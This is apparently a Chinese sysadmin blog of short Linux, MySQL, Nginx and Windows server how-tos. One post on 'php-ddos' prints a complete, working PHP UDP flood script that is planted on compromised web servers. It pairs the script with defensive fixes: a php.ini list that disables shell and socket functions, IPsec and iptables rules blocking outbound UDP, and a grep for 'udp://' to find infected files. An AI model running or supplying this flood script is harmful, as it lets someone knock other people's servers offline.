風雲记事

ubuntu服务器版gnome桌面安装

2012-02-03T16:41:14+08:00

建议ubuntu版本10.04或更高
获取下更新
apt-get update
安装更新(可选操作)
apt-get -y upgrade
安装完整版本ubuntu-gnome桌面（debian不适用该指令）
apt-get install -y ubuntu-desktop
等待安装完成
安装vnc
apt-get install -y vnc4server x11vnc
启动VNC（首次使用设置密码）
vncserver
设置你的密码后，会启动VNC
现在可以进入桌面，但是不是gnome桌面，我们还要设置一下
结束VNC进程
pkill -9 vnc
清除日志文件
rm -rf /tmp/.X1*
编辑配置文件
vi ~/.vnc/xstartup
在最底部添加一行
gnome-session &
保存，并启动VNC
vncserver
这样，就可以进入gnome桌面了？
ubuntu的默认端口是5901 （debian通常为1）
注：请勿越步操作

Linux 设置apache,mysql开机启动

2011-12-15T21:06:04+08:00

mysql设为linux服务

cp /usr/local/mysql5/share/mysql/mysql.server /etc/init.d/mysqld
chkconfig --add mysqld
chkconfig --level 2345 mysqld on
chown mysql:mysql -R /usr/local/mysql5/
service mysqld start

apache设为linux服务

cp /usr/local/apache2/bin/apachectl /etc/init.d/httpd
vi /etc/init.d/httpd

在在#!/bin/sh后面加入下面两行
#chkconfig:345 85 15
#description: Start and stops the Apache HTTP Server.

然后
chmod +x /etc/rc.d/init.d/httpd
chkconfig --add httpd
然后可以用setup命令进入服务设置，设置为开机启动

第二种方法：
在/etc/rc.d/rc.local中增加启动apache的命令，例如：/usr/local/httpd/bin/apachectl start
----------------------------------
chkconfig命令收藏
功能说明：检查、设定系统的各种服务。

语法：chkconfig [--add][--del][--list][系统服务]或
chkconfig [--level<等级代号>][系统服务][on/off/reset]

补充说明:这个是redhat公司遵循gpl规则所开发的程序,它可以查询操作系统在每一个执行等级(runlevel)中,会执行哪些系统服务，其中包括各种daemon。
linux os 将操作环境分为以下7个等级:

0:开机(请不要切换到此等级)
1:单人使用者模式的文字界面
2:多人使用者模式的文字界面,不具有网络档案系统(NFS)功能
3:多人使用者模式的文字界面,具有网络档案系统(NFS)功能
4:某些发行版的linux使用此等级进入x windows system
5:某些发行版的linux使用此等级进入x windows system
6:重新启动

参数:    --add   新增所指定的系统服务
         --del 删除所指定的系统服务
         --level 指定该系统服务要在哪个执行等级中开启或关闭
         --list   列出当前可从chkconfig指令管理的所有系统服务和等级代号
            on/off/reset   在指定的执行登记,开启/关闭/重置该系统服务
chkconfig命令主要用来更新（启动或停止）和查询系统服务的运行级信息。谨记chkconfig不是立即自动禁止或激活一个服务，它只是简单的改变了符号连接。
语法：
    chkconfig --list [name]
    chkconfig --add name
    chkconfig --del name
    chkconfig [--level levels] name
    chkconfig [--level levels] name
    chkconfig 没有参数运行时，显示用法。如果加上服务名，那么就检查这个服务是否在当前运行级启动。如果是，返回true，否则返回false。如果在服务名后面指定了on，off或者reset，那么chkconfi 会改变指定服务的启动信息。on和off分别指服务被启动和停止，reset指重置服务的启动信息，无论有问题的初始化脚本指定了什么。on和off开关，系统默认只对运行级3，4，5有效，但是reset可以对所有运行级有效。
    --level选项可以指定要查看的运行级而不一定是当前运行级。
    需要说明的是，对于每个运行级，只能有一个启动脚本或者停止脚本。当切换运行级时，init不会重新启动已经启动的服务，也不会再次去停止已经停止的服务。
    chkconfig --list ：显示所有运行级系统服务的运行状态信息（on或off）。如果指定了name，那么只显示指定的服务在不同运行级的状态。
    chkconfig --add name：增加一项新的服务。chkconfig确保每个运行级有一项启动(S)或者杀死(K)入口。如有缺少，则会从缺省的init脚本自动建立。
    chkconfig --del name：删除服务，并把相关符号连接从/etc/rc[0-6].d删除。
    chkconfig [--level levels] name ：设置某一服务在指定的运行级是被启动，停止还是重置。例如，要在3，4，5运行级停止nfs服务，则命令如下：
    chkconfig --level 345 nfs off
运行级文件：
    每个被chkconfig管理的服务需要在对应的init.d下的脚本加上两行或者更多行的注释。第一行告诉chkconfig缺省启动的运行级以及启动和停止的优先级。如果某服务缺省不在任何运行级启动，那么使用 - 代替运行级。第二行对服务进行描述，可以用\ 跨行注释。
例如，random.init包含三行：
# chkconfig: 2345 20 80
# description: Saves and restores system entropy pool for \
# higher quality random number generation.
附加介绍一下Linux系统的运行级的概念：
    Linux中有多种运行级，常见的就是多用户的2，3，4，5 ，很多人知道5是运行X-Windows的级别，而0就是关机了。运行级的改变可以通过init命令来切换。例如，假设你要维护系统进入单用户状态，那么，可以使用init1来切换。在Linux的运行级的切换过程中，系统会自动寻找对应运行级的目录/etc/rc[0-6].d下的K和S开头的文件，按后面的数字顺序，执行这些脚本。对这些脚本的维护，是很繁琐的一件事情，Linux提供了chkconfig命令用来更新和查询不同运行级上的系统服务。
范例:

1.查看在各种不同的执行等级中,各项服务的状况:
$chkconfig --list

2.列出系统服务vsftpd在各个执行等级的启动情况：
$chkconfig --list vsftpd

3.在执行等级3,5时，关闭vsftpd系统服务：
$chkconfig --level 35 vsftpd off

4.在执行等级2，3，5时，开启 vsftpd系统服务：
$chkconfig --level 235 vsftpd on

5.关闭一些自己不需要的服务 ->
如果没有打印机：
chkconfig --level 235 cups off
如果没有局域网：
chkconfig --level 235 smb off
如果不需要远程用户登录的：
chkconfig --level 235 sshd off
如果不需要定时任务的：
chkconfig --level 235 crond off
如果不需要添加新硬件的：
chkconfig --level 235 kudzu off

Xen VPS 时间异常的解决方法

2011-11-30T13:29:08+08:00

1.通过SSH登陆到VPS.

2.vim /etc/sysctl.conf

3.在文件底部加入

xen.independent_wallclock=1
4.执行 sysctl -p

5.执行以下命令：

rm -rf /etc/localtime
ln -s /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
yum install -y ntp
ntpdate us.pool.ntp.org
date

关于php-ddos

2011-11-28T21:45:50+08:00

特征:用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:

$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_GET[\'time\'];

$time = time();
print \"Flooded: $ip on port $rand

\";
$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}

$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>

表现特征:一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到ddos攻击是不同的,Ddos是不断收到大量数据包.

解决办法:
先停止IIS，这样就暂时没法对外攻击了，然后

禁止上述的代码:
在c:\windows\php.ini里设置:
disable_functions =gzinflate,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen

在c:\windows\php.ini里设其值为Off
allow_url_fopen = Off

并且:

;extension=php_sockets.dll

前面的;号一定要有,意思就是限制用sockets.dll

前面的;号要保留

然后启动IIS

如果上述方式仍然无效,你可以在IIS中,允许的扩展中,禁止PHP的扩展测试.

另外,对于没加密的php攻击代码,还可以用以下办法处理:
1.在IP策略,或防火墙中,禁止所有udp向外发送
将以下红色文本复制到记事本，另存为 banudp.bat 或任意名，双击运行即可，

REM 添加安全策略，名称
netsh ipsec static add policy name=我的安全策略

REM 添加 IP筛选器列表
netsh ipsec static add filterlist name=允许列表
netsh ipsec static add filterlist name=拒绝列表

REM 添加筛选器到IP筛选器列表(允许上网)
netsh ipsec static add filter filterlist=允许列表  srcaddr=me dstaddr=any description=dns访问 protocol=udp mirrored=yes dstport=53

REM 添加筛选器到IP筛选器列表(不让别人访问)
netsh ipsec static add filter filterlist=拒绝列表 srcaddr=any dstaddr=me description=别人到我任何访问 protocol=udp mirrored=yes

REM 添加筛选器操作
netsh ipsec static add filteraction name=可以  action=permit
netsh ipsec static add filteraction name=不可以  action=block

REM 创建一个链接指定 IPSec 策略、筛选器列表和筛选器操作的规则(加入规则到我的安全策略)
netsh ipsec static add rule name=允许规则  policy=我的安全策略 filterlist=允许列表 filteraction=可以
netsh ipsec static add rule name=拒绝规则  policy=我的安全策略 filterlist=拒绝列表 filteraction=不可以

REM 激活我的安全策略
netsh ipsec static set policy name=我的安全策略 assign=y

2.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词

win2003 关闭udp 也可使用西部数据发布的补丁程序，下载地址是：

http://downinfo.myhostadmin.net/udpdeny.rar

解压后双击"udp.bat"即可自动创建安全规则。

找到phpddos文件的方法

首先创建一个文件夹

mkdir /scan/
然后搜索所有带了udp://的php文件

find /home/* -type f -name "*.php" |xargs grep "udp://" > /scan/scan.txt

搜索完毕之后查看/scan/scan.txt即可，如果phpddos木马是加密的，这个就需要点手段了，搜索加密字符。

这个方法也可以用来搜索webshell

虽然很老套，不过很管用。

linux系统下，可通过配置iptables过滤udp数据。以下规则供参考。

iptables -A INPUT -p tcp -m tcp --sport 53 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -p udp -m udp --sport 53 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp -m tcp --sport 1024:65535 -d 209.11.240.36 --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p udp -m udp --sport 1024:65535 -d 209.11.240.36 --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p udp -j REJECT

参考资料：http://www.hostloc.com/thread-55975-1-1.html
http://0e2.net/post/1524.html

Mysql命令备份所有数据库

2011-11-18T23:06:14+08:00

mysqldump --user=用户名 --password=密码 --lock-all-tables --all-databases >

linux下面设置或者改变mysql中文编码

2011-10-10T20:20:10+08:00

最近用一台LINUX机器做数据库服务器，上面装了MYSQL数据库，项目的数据库就全都放这台机器，但是默认的MYSQL编码都是latin1的，如果存中文就会有问题，解决方案如下：

#vi /etc/my.cnf

在里面相应的地方加上如下编码设置
[mysqld]
default-character-set=gbk

[mysql.server]
default-character-set=gbk

[mysqld_safe]

default-character-set=gbk

[client]
default-character-set=gbk

[mysql]
default-character-set=gbk

重启MYSQL即可。

如果不知道MYSQL在哪个地方，运行
#whereis mysql

即可找到MYSQL安装在哪个地方

如果想查设置是不是成功了，可以运行如下命令：

# mysql -u root -proot
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2 to server version: 5.0.22

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show variables like '%char%';
+--------------------------+----------------------------+
| Variable_name | Value |
+--------------------------+----------------------------+
| character_set_client | gbk |
| character_set_connection | gbk |
| character_set_database | gbk |
| character_set_filesystem | binary |
| character_set_results | gbk |
| character_set_server | gbk |
| character_set_system | utf8 |
| character_sets_dir | /usr/share/mysql/charsets/ |
+--------------------------+----------------------------+
8 rows in set (0.00 sec)

上面的就已经显示编码设置成功了。

宏碁（acer）AOD257-N57Ckk 10.1英寸笔记本电脑无线网卡驱动for xp

2011-09-13T13:56:42+08:00

宏碁（acer）AOD257-N57Ckk 10.1英寸笔记本电脑这个上网本默认装的是linux系统，回来用u盘改装了xp,呵呵，那个网卡驱动叫难找啊。

后来先找了一个无线网卡的驱动，见下面的下载地址
然后连上网，装上驱动精灵，呵呵，驱动然后全部搞定。哈哈。

京东上买的上网本。

如果有朋友装了xp找不到驱动，就可以试试这个办法哈。当然如果你没有无线网络，你先要找网卡的那个驱动了。。。
http://u.115.com/file/dnh4k620#Intel_Advanced-N_drv14.0_XP_32.rar

Nginx的配置安全加固分享

2011-06-10T19:42:30+08:00

下面分享一段NGINX的配置代码，具体作用附有简单注释。
大家要记住一个原则，那就是：能执行php程序的目录一定不要开放读写权限，而可以读写的目录(比如上传)一定不要赋予php执行权限。

这段代码需要放在server段里面(较前位置，最好放在location / {...}前面)，也可以存成一个文件在每个vhost里include一下

# 2011 (C) cnpanel
# Disable visitors without agent
if ($http_user_agent ~ ^$) { return 412; }
# Disable possible Apache access files
location ~ /\.ht {deny all;}
# Never can not visit or download files or DIRs starting with #
location ~ /\# {deny all;}
# Disable risk request in some DIRs for secure
location ~* /(image|images|img|imgs|upload|uploads|upimg|upimgs|upfile|upfiles|down|download|downloads|attachment|attachments|js|css|style|styles|tpl|template|templates|theme|themes|view|views|lang|language|languages|setting|settings|app|apps|include|includes|class|classes|mod|mods|model|models|lib|libs|control|controls|source|sources|plugin|plugins|data|datas|database|tmp|temp|ipdata|html|avatar|avatars)/(.*)\.(php|php3|php4|php5|cgi|asp|aspx|jsp|shtml|shtm|pl|cfm|sql|mdb|dll|exe|com|inc|sh)$ {deny all;}

注意。这里边的目录，如果和自己的程序的有的目录影响的，可以自己设置。
这个是网友分享的。

linux下mysql的root密码忘记解决方法

2011-06-10T18:17:37+08:00

一. MySQL密码的恢复方法之一

1．首先确认服务器出于安全的状态，也就是没有人能够任意地连接MySQL数据库。
因为在重新设置MySQL的root密码的期间，MySQL数据库完全出于没有密码保护的
状态下，其他的用户也可以任意地登录和修改MySQL的信息。可以采用将MySQL对
外的端口封闭，并且停止Apache以及所有的用户进程的方法实现服务器的准安全
状态。最安全的状态是到服务器的Console上面操作，并且拔掉网线。

2．修改MySQL的登录设置：
# vi /etc/my.cnf
在[mysqld]的段中加上一句：skip-grant-tables
例如：
[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
skip-grant-tables
保存并且退出vi。

3．重新启动mysqld
# /etc/init.d/mysqld restart
Stopping MySQL: [ OK ]
Starting MySQL: [ OK ]

4．登录并修改MySQL的root密码
# /usr/bin/mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 3 to server version: 3.23.56

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> USE mysql ;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> Update user SET Password = password ( 'new-password' ) Where User = 'root' ;
Query OK, 0 rows affected (0.00 sec)
Rows matched: 2 Changed: 0 Warnings: 0

mysql> flush privileges ;
Query OK, 0 rows affected (0.01 sec)

mysql> quit
Bye

5．将MySQL的登录设置修改回来
# vi /etc/my.cnf
将刚才在[mysqld]的段中加上的skip-grant-tables删除
保存并且退出vi。

6．重新启动mysqld
# /etc/init.d/mysqld restart
Stopping MySQL: [ OK ]
Starting MySQL: [ OK ]

7．恢复服务器的正常工作状态
将步骤一中的操作逆向操作。恢复服务器的工作状态。

二。 MySQL密码的恢复方法之二
如果忘记了MySQL的root密码，可以用以下方法重新设置：
1. KILL掉系统里的MySQL进程；
killall -TERM mysqld
2. 用以下命令启动MySQL，以不检查权限的方式启动；
safe_mysqld --skip-grant-tables &
3. 然后用空密码方式使用root用户登录 MySQL；
mysql -u root
4. 修改root用户的密码；
mysql> update mysql.user set password=PASSWORD('新密码') where User='root';
mysql> flush privileges;
mysql> quit
重新启动MySQL，就可以使用新密码登录了。

三. MySQL密码的恢复方法三
有可能你的系统没有 safe_mysqld 程序(比如我现在用的 ubuntu操作系统, apt-get安装的mysql) , 下面方法可以恢复
1. 停止mysqld；
/etc/init.d/mysql stop
(您可能有其它的方法,总之停止mysqld的运行就可以了)
2. 用以下命令启动MySQL，以不检查权限的方式启动；
mysqld --skip-grant-tables &
3. 然后用空密码方式使用root用户登录 MySQL；
mysql -u root
4. 修改root用户的密码；
mysql> update mysql.user set password=PASSWORD('newpassword') where User='root';
mysql> flush privileges;
mysql> quit
重新启动MySQL
/etc/init.d/mysql restart
就可以使用新密码 newpassword 登录了。

http://blog.chinaunix.net/space.php?uid=20544356&do=blog&id=132378

win2003 超过最大连接数设置允许多人同时远程连接

2011-06-08T09:53:08+08:00

表现：可以两个用户连接上，第三个用户再连接，会提示“超过最大连接数”

1、检查可用连接数

控制面板---管理工具---终端服务配置--连接---右侧窗口（右键RDP-Tcp属性）---网卡--可以看到这里可用连接数默认为2，这是主要原因

2、安装2个终端相关的2个服务

控制面板--添加删除程序---添加/删除 windows组件----终端服务器和终端服务器授权

3、激活终端服务授权

管理工具---终端服务授权---右侧窗口（右键选激活服务，按向导即可。）

4、更改终端服务设置

管理工具---终端服务配置---左侧窗口（点击服务器设置）---右侧窗口，将限制每个用户使用一个会话设置为否。

5、检查和设置第一步的操作（更改限制数，如30）。

可以在运行里打开gpedit.msc，依次展开：计算机配置——>管理模板——>windows组件——>终端服务。
在右边。配置，限制终端服务用户到一个远程会话——禁用（当然如果你不希望同一个用户多个人同时登录的话就不要禁用啦），限制连接数量——启用（并且里边填写适当的数字），允许用户使用终端服务远程连接——启用。